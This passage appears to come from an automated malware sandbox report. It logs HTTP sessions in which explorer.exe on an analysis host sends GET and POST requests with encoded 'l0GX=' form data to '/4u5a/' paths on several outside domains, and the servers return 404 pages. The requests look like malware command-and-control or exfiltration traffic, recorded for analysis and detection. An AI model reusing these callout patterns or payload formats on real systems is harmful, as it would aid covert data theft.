                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.649726162.213.255.14280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:56.424715042 CET151OUTGET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1
                                        Host: www.marketmall.digital
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:56.725609064 CET152INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:25:56 GMT
                                        Server: Apache
                                        Content-Length: 1080
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.649727172.67.148.13280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:26:01.797384977 CET153OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Content-Length: 190
                                        Cache-Control: no-cache
                                        Origin: http://www.canadianlocalbusiness.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.canadianlocalbusiness.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 67 43 4f 73 59 4c 4b 6b 4a 51 47 58 76 58 46 49 49 45 70 38 35 54 65 6a 39 36 75 2d 35 6b 7a 72 58 62 7a 39 43 75 79 6b 45 4a 70 77 61 34 59 35 72 6b 73 4e 7e 48 38 6a 4f 42 62 58 62 58 4d 44 74 67 45 7a 58 30 33 41 6a 6e 59 52 62 30 55 76 54 4b 36 5a 37 31 59 51 6c 45 58 6e 69 51 49 45 74 64 51 5f 73 75 47 50 39 46 6f 4b 42 34 53 4e 61 56 4a 4d 71 6e 61 74 79 76 70 64 73 4f 76 33 6e 69 7a 51 64 33 34 76 68 6d 45 35 67 72 64 6c 36 2d 38 5a 7e 4f 73 6a 63 50 46 64 28 72 6f 58 46 43 34 31 55 52 49 6a 45 31 73 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
                                        Nov 29, 2022 18:26:02.036621094 CET154INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:02 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bc54f76cb33-DUS
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a
                                        Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
                                        Nov 29, 2022 18:26:02.036678076 CET154INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.649728172.67.148.13280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:26:03.840754986 CET157OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.canadianlocalbusiness.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.canadianlocalbusiness.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 68 69 7e 73 64 6f 69 6b 65 41 47 59 6a 33 46 49 61 45 70 34 35 54 53 6a 39 37 71 75 35 57 28 72 58 4a 62 39 43 4d 71 6b 58 35 70 77 4c 6f 5a 77 6b 45 73 6c 7e 48 42 61 4f 41 72 48 62 55 67 44 73 43 73 7a 52 78 44 48 74 33 59 54 4b 6b 55 75 54 4b 37 44 37 31 49 55 6c 45 54 4a 69 51 67 45 74 6f 38 5f 71 65 47 4d 6a 56 6f 4b 42 34 53 5a 61 56 49 56 71 6e 44 72 79 75 78 4e 73 66 28 33 6e 41 37 51 62 51 73 73 78 6d 45 6c 7e 62 64 33 28 38 31 77 31 2d 34 6a 63 38 4a 45 76 61 4d 49 4e 51 73 34 43 51 70 69 56 68 47 67 4c 4f 35 46 54 58 64 6d 50 41 4e 64 50 56 42 47 72 79 61 46 4b 5a 50 56 4f 51 59 4e 53 30 43 45 36 67 67 2d 41 33 64 6f 73 49 79 6b 37 30 5a 50 37 6c 61 76 58 68 32 65 32 67 54 57 4a 4f 5a 53 73 74 53 49 6b 78 38 58 46 76 33 43 67 68 75 6d 59 5f 36 48 77 41 62 6e 4d 4d 51 4f 75 4a 48 5a 51 43 28 74 64 6f 4c 4d 41 57 5a 45 36 74 71 4f 74 79 4d 43 5a 71 72 46 50 30 4c 38 50 4e 42 56 6b 64 4b 44 45 62 72 58 68 36 30 76 56 73 75 66 6b 63 49 56 36 4d 74 58 74 62 4d 78 4d 54 6b 69 76 57 62 31 79 68 41 6c 50 33 66 30 6a 35 41 73 57 6c 4b 5a 68 30 6f 46 49 4a 47 5a 6f 48 53 31 76 44 48 44 50 66 74 37 64 6c 4a 79 71 78 78 5f 6a 6c 31 78 68 6b 35 64 57 33 79 33 34 4e 4d 46 42 75 5a 73 42 61 4e 78 32 39 67 41 6b 54 68 39 38 79 61 77 61 4f 63 61 31 46 5a 54 45 71 61 4b 7e 37 4b 47 54 78 37 4b 52 30 69 43 57 70 6a 47 5a 73 43 5a 28 46 4c 52 77 67 50 49 45 50 69 50 69 7a 68 62 57 6c 72 51 6c 4c 73 4a 49 4b 36 69 37 59 61 70 4d 53 47 48 69 4d 36 36 36 71 46 61 69 30 28 73 48 35 6b 74 6b 69 67 7a 6d 66 6f 54 54 74 67 7a 49 42 74 6d 7e 6c 69 33 31 70 77 46 30 79 75 4d 58 6c 4a 32 58 55 52 49 35 32 67 37 65 59 6d 49 34 79 53 38 36 56 36 49 38 39 59 6d 28 72 76 34 44 72 6f 55 30 68 38 6f 7e 6d 6d 44 67 74 6b 49 73 5a 46 41 36 61 30 35 59 67 4e 59 72 30 45 45 49 47 55 4b 65 4c 33 6d 41 4d 38 4e 6d 56 4a 48 70 35 32 4d 28 58 7a 57 53 6c 58 53 6e 69 41 36 46 55 71 45 63 43 72 56 7a 32 6a 65 47 78 46 43 47 44 37 55 76 6c 36 56 63 79 48 70 43 34 44 35 51 44 69 62 78 59 79 62 4c 6f 69 70 47 51 7e 6a 74 2d 32 73 74 64 41 59 32 57 47 61 28 5a 6e 36 51 6b 32 54 33 4e 37 4a 6f 39 28 75 30 31 48 39 78 74 54 75 72 48 28 67 6a 5a 68 32 54 67 61 51 6a 66 72 6a 4a 76 69 2d 7a 62 4c 33 51 55 42 57 74 69 4d 59 79 32 4f 4d 53 74 31 47 50 4d 7e 77 55 36 72 65 63 52 72 6d 70 4b 28 78 4e 55 6d 38 33 43 59 6d 43 52 44 51 50 73 38 39 46 58 62 56 48 7a 43 4f 59 6e 4d 52 56 57 6e 6f 4b 57 59 79 79 4b 5a 5f 4a 6c 61 35 44 70 6e 54 4f 41 7a 63 4b 4c 48 35 4f 4a 51 4c 4e 5f 50 5f 57 4c 28 5a 68 71 39 79 77 4c 53 4c 76 65 50 68 4f 55 36 72 65 35 43 55 32 35 4c 6c 62 35 6d 48 43 73 31 45 53 32 74 43 4b 76 72 42 37 47 55 71 57 54 72 56 78 6b 64 2d 4c 43 6e 50 61 47 34 69 79 2d 36 62 70 59 4c 51 4b 7a 43 75 4e 38 46 6f 52 4c 6b 66 4f 4d 54 6b 67 41 42 4b 63 6f 28 31 71 4c 43 6b 4d 53 51 73 66 74 32 72 6b 45 72 47 39 6b 69 7a 5a 41 30 4f 6d 48 4c 31 56 5a 65 4a 63 31 6a 51 64 71 58 78 52 71 77 41 30 37 77 37 52 41 4b 42 6c 46 39 72 6e 6b 4d 50 65 54 71 65 52 6c 38 36 4d 31 76 4e 55 62 36 48 76 43 4e 4e 42 53 7e 32 52 55 4b 59 7e 61 6d 45 37 6d 59 71 50 31 59 39 43 66 57 45 41 77 64 4b 4d 36 4d 59 51 46 4f 77 4f 37 4d 71 4d 44 6b 62 6e 38 6d 74 61 2d 67 48 50 49 75 77 6c 48 38 30 4b 6e 73 35 31 36 67 54 57 4f 41 64 28 6e 55 65 72 4a 4a 64 4e 49 4a 47 78 6a 57 31 62 33 41 68 64 4e 70 53 52 48 78 6f 46 67 37 4f 30 42 63 4a 39 37 48 44 59 55 66 52 28 68 35 2d 78 31 58 73 36 54 7a 64 6d 48 61 77 28 46 4a 50 43 56 70 66 32 6e 4f 50 4d 51 44 53 44 34 6d 6b 50 43 77 42 37 45 4b 4d 78 54 4a 6e 7e 48 51 6c 30 69 78 30 6a 31 72 78 55 53 4b 66 41 6d 68 67 6e 45 56 44 31 72 6a 7a 63 5f 41 49 42 4c 6b 6e 47 71 6b 36 36 4f 67 33 4d 55 33 47 45 65 50 37 4d 76 66 6b 47 66 53 52 28 67 48 6d 49 69 79 5a 4d 64 28 4f 63 74 48 41 4a 6a 70 6b 61 6d 44 67 7a 39 7e 6c 67 41 6e 4a 4f 71 62 7a 4c 47 72 36 35 4c 4f 50 54 69 31 35 52 65 75 33 35 45 31 6f 53 50 4b 33 57 5a 49 6f 45 4e 66 66 68 73 72 4b 63 64 68 68 70 78 44 75 4d 63 41 71 4a 50 7a 4e 4d 6a 61 73 7a 71 50 30 79 7a 6e 78 30 62 42 2d 30 4f 50 76 68 6a 6d 49 6b 5a 77 4e 44 53
                                        Data Ascii: l0GX=lCbw7QlVMFZghi~sdoikeAGYj3FIaEp45TSj97qu5W(rXJb9CMqkX5pwLoZwkEsl~HBaOArHbUgDsCszRxDHt3YTKkUuTK7D71IUlETJiQgEto8_qeGMjVoKB4SZaVIVqnDryuxNsf(3nA7QbQssxmEl~bd3(81w1-4jc8JEvaMINQs4CQpiVhGgLO5FTXdmPANdPVBGryaFKZPVOQYNS0CE6gg-A3dosIyk70ZP7lavXh2e2gTWJOZSstSIkx8XFv3CghumY_6HwAbnMMQOuJHZQC(tdoLMAWZE6tqOtyMCZqrFP0L8PNBVkdKDEbrXh60vVsufkcIV6MtXtbMxMTkivWb1yhAlP3f0j5AsWlKZh0oFIJGZoHS1vDHDPft7dlJyqxx_jl1xhk5dW3y34NMFBuZsBaNx29gAkTh98yawaOca1FZTEqaK~7KGTx7KR0iCWpjGZsCZ(FLRwgPIEPiPizhbWlrQlLsJIK6i7YapMSGHiM666qFai0(sH5ktkigzmfoTTtgzIBtm~li31pwF0yuMXlJ2XURI52g7eYmI4yS86V6I89Ym(rv4DroU0h8o~mmDgtkIsZFA6a05YgNYr0EEIGUKeL3mAM8NmVJHp52M(XzWSlXSniA6FUqEcCrVz2jeGxFCGD7Uvl6VcyHpC4D5QDibxYybLoipGQ~jt-2stdAY2WGa(Zn6Qk2T3N7Jo9(u01H9xtTurH(gjZh2TgaQjfrjJvi-zbL3QUBWtiMYy2OMSt1GPM~wU6recRrmpK(xNUm83CYmCRDQPs89FXbVHzCOYnMRVWnoKWYyyKZ_Jla5DpnTOAzcKLH5OJQLN_P_WL(Zhq9ywLSLvePhOU6re5CU25Llb5mHCs1ES2tCKvrB7GUqWTrVxkd-LCnPaG4iy-6bpYLQKzCuN8FoRLkfOMTkgABKco(1qLCkMSQsft2rkErG9kizZA0OmHL1VZeJc1jQdqXxRqwA07w7RAKBlF9rnkMPeTqeRl86M1vNUb6HvCNNBS~2RUKY~amE7mYqP1Y9CfWEAwdKM6MYQFOwO7MqMDkbn8mta-gHPIuwlH80Kns516gTWOAd(nUerJJdNIJGxjW1b3AhdNpSRHxoFg7O0BcJ97HDYUfR(h5-x1Xs6TzdmHaw(FJPCVpf2nOPMQDSD4mkPCwB7EKMxTJn~HQl0ix0j1rxUSKfAmhgnEVD1rjzc_AIBLknGqk66Og3MU3GEeP7MvfkGfSR(gHmIiyZMd(OctHAJjpkamDgz9~lgAnJOqbzLGr65LOPTi15Reu35E1oSPK3WZIoENffhsrKcdhhpxDuMcAqJPzNMjaszqP0yznx0bB-0OPvhjmIkZwNDSQyAW3hvGjBlOG_UVN4MXeorHMbG7triQHXupe_mTRph-AbQkGf6RU4PyU3JvsM9X7hNVweCz(CAyPJr-ota6EJNTk.
                                        Nov 29, 2022 18:26:04.094774008 CET158INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bd20dfdcb0d-DUS
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a
                                        Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
                                        Nov 29, 2022 18:26:04.094841957 CET158INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.649729172.67.148.13280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:26:05.883320093 CET158OUTGET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1
                                        Host: www.canadianlocalbusiness.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:26:06.166044950 CET159INHTTP/1.1 404 Not Found
                                        Date: Tue, 29 Nov 2022 17:26:06 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 771d0bdedcba9b83-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                        Nov 29, 2022 18:26:06.166151047 CET159INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.64971689.31.143.180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:14.601547003 CET123OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.dersameh.com
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.dersameh.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.dersameh.com/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 68 33 51 7a 33 64 38 52 56 63 28 78 65 5a 48 51 72 49 4b 6a 35 72 69 31 30 7a 6b 55 6a 6e 4b 5f 76 50 42 77 58 79 41 4e 31 31 4c 5a 69 66 43 4f 65 62 76 51 28 46 72 2d 79 39 61 42 78 70 37 55 33 62 66 33 75 73 6a 64 59 46 44 46 4c 53 54 6c 62 51 56 4f 64 6d 47 65 53 45 55 61 4b 4c 70 4a 28 52 4f 47 57 51 61 4c 61 65 35 64 4a 72 4b 59 73 41 67 48 56 43 37 62 4b 61 71 44 33 43 35 39 28 5a 51 68 4a 7a 30 6c 42 72 68 38 62 6c 64 50 42 43 46 37 79 47 42 46 59 65 4b 2d 69 72 38 4b 6c 5a 4e 72 7e 63 62 44 68 78 61 54 7a 5f 4f 49 4e 79 6e 37 54 6f 57 4d 7e 73 51 33 6f 50 6f 4c 61 70 4f 41 33 41 36 30 6e 4f 67 6a 46 4d 57 69 72 52 4c 68 35 30 69 78 72 4b 6a 41 64 51 72 76 36 51 53 37 6a 33 51 72 53 5f 7e 5a 73 30 38 36 72 45 34 52 74 77 56 4c 7a 48 6d 4d 54 4b 7e 44 62 58 62 5f 4e 51 47 6d 69 62 37 4a 46 4e 49 55 53 47 36 39 74 48 4a 75 4d 64 63 5f 63 2d 30 61 55 6e 6b 4c 58 46 54 48 31 5a 48 61 49 6e 42 50 63 37 65 6f 55 4e 79 2d 6f 4f 34 61 6a 38 53 65 47 5f 66 6a 65 70 7a 71 69 72 65 46 6f 44 53 51 5a 31 74 76 65 43 57 71 57 6d 32 4f 69 5a 51 4b 78 5f 38 31 67 48 51 72 53 7a 43 5f 63 6a 63 4c 64 6a 46 69 62 35 41 74 55 49 7e 67 34 53 52 48 51 5a 7a 51 75 52 59 41 62 39 50 35 79 66 54 4d 61 4b 38 61 4b 73 72 69 64 78 4d 68 30 77 48 61 76 69 5a 45 5a 68 42 30 78 35 41 32 4f 70 46 66 33 6c 55 54 70 61 71 31 56 4e 36 42 38 52 34 6f 63 44 58 31 7e 74 6f 68 7a 68 4e 56 46 63 61 69 34 6e 47 78 79 32 45 62 6a 65 38 49 7e 37 48 62 31 7a 65 79 61 6f 4d 6b 43 77 5a 42 69 65 30 4c 41 69 56 63 30 74 46 76 42 53 31 47 79 67 55 2d 46 42 64 46 33 65 4c 4f 4d 2d 28 44 34 78 4f 71 70 4b 5a 5f 39 2d 42 67 73 47 79 77 64 33 57 70 7e 53 52 35 36 6b 7a 6e 56 52 4e 77 6f 44 6d 55 72 6e 50 43 48 42 31 42 7e 65 6e 4b 32 55 44 44 6c 71 32 71 62 32 42 6d 4a 51 7a 58 67 6e 35 2d 52 2d 48 55 56 50 57 6b 62 44 5a 71 49 61 6e 33 68 53 57 55 4e 62 50 55 52 39 6d 47 57 41 62 6b 37 48 55 58 4b 46 7e 36 4b 41 34 5f 41 34 5a 70 56 42 49 47 39 54 66 30 75 31 5a 4b 34 69 49 36 4f 44 49 59 39 73 48 7a 71 6a 7e 78 6a 52 36 44 4d 79 50 69 54 5a 4d 39 39 5f 63 6f 63 63 65 46 74 6e 54 58 32 31 47 35 75 5f 7e 33 6f 30 71 72 6a 